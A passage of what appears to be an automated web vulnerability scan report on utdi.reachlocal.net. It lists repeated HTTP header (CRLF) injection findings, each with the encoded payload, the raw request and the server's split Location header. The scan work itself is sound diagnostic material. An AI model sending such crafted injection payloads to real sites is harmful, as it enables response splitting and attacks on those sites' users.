Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:40 GMT
Server: Apache
Location: http://utdi.com/ac19a
7030fac53e2
/navbutton_about-ovr.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ac19a
7030fac53e2/navbutton_ab
...[SNIP]...

1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_about.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 564c7%0d%0ae0db7ba9b90 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (e0db7ba9b90) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /564c7%0d%0ae0db7ba9b90/navbutton_about.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:41 GMT
Server: Apache
Location: http://utdi.com/564c7
e0db7ba9b90
/navbutton_about.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:33 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/564c7
e0db7ba9b90/navbutton_ab
...[SNIP]...

1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_client-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload d5ca8%0d%0abf51af5b896 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (bf51af5b896) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /d5ca8%0d%0abf51af5b896/navbutton_client-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/d5ca8
bf51af5b896
/navbutton_client-ovr.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d5ca8
bf51af5b896/navbutton_cl
...[SNIP]...

1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_client.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 37f02%0d%0ab42a12b1bbf (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (b42a12b1bbf) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /37f02%0d%0ab42a12b1bbf/navbutton_client.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:45 GMT
Server: Apache
Location: http://utdi.com/37f02
b42a12b1bbf
/navbutton_client.jpg
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/37f02
b42a12b1bbf/navbutton_cl
...[SNIP]...

1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_contact-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 7f0e7%0d%0a7c06fd67eb5 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (7c06fd67eb5) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /7f0e7%0d%0a7c06fd67eb5/navbutton_contact-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:34 GMT
Server: Apache
Location: http://utdi.com/7f0e7
7c06fd67eb5
/navbutton_contact-ovr.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:27 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7f0e7
7c06fd67eb5/navbutton_co
...[SNIP]...

1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_contact.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload d419b%0d%0a6740deaef7b (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (6740deaef7b) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /d419b%0d%0a6740deaef7b/navbutton_contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:42 GMT
Server: Apache
Location: http://utdi.com/d419b
6740deaef7b
/navbutton_contact.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d419b
6740deaef7b/navbutton_co
...[SNIP]...

1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_products-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 355c6%0d%0a88702d4c646 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (88702d4c646) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /355c6%0d%0a88702d4c646/navbutton_products-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/355c6
88702d4c646
/navbutton_products-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:31 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/355c6
88702d4c646/navbutton_pr
...[SNIP]...

1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_products.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 789fe%0d%0a5615b38ed3b (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (5615b38ed3b) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /789fe%0d%0a5615b38ed3b/navbutton_products.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/789fe
5615b38ed3b
/navbutton_products.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/789fe
5615b38ed3b/navbutton_pr
...[SNIP]...

1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_projects-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 6907f%0d%0a53622b16624 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (53622b16624) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /6907f%0d%0a53622b16624/navbutton_projects-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:38 GMT
Server: Apache
Location: http://utdi.com/6907f
53622b16624
/navbutton_projects-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/6907f
53622b16624/navbutton_pr
...[SNIP]...

1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_projects.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload ad123%0d%0aeb18754afb7 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (eb18754afb7) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /ad123%0d%0aeb18754afb7/navbutton_projects.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Location: http://utdi.com/ad123
eb18754afb7
/navbutton_projects.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ad123
eb18754afb7/navbutton_pr
...[SNIP]...

1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_services-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 4acb8%0d%0ab541b30dd04 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (b541b30dd04) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /4acb8%0d%0ab541b30dd04/navbutton_services-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:37 GMT
Server: Apache
Location: http://utdi.com/4acb8
b541b30dd04
/navbutton_services-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/4acb8
b541b30dd04/navbutton_se
...[SNIP]...

1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_services.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 35525%0d%0a72310b3416a (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (72310b3416a) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /35525%0d%0a72310b3416a/navbutton_services.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/35525
72310b3416a
/navbutton_services.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/35525
72310b3416a/navbutton_se
...[SNIP]...

1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/partner-logos-avaya.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 3b074%0d%0ae845103065b (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (e845103065b) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /3b074%0d%0ae845103065b/partner-logos-avaya.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/3b074
e845103065b
/partner-logos-avaya.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3b074
e845103065b/partner-logo
...[SNIP]...

1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/partner-logos-sonexis.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9d65%0d%0a27fb644bc97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9d65%0d%0a27fb644bc97/partner-logos-sonexis.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
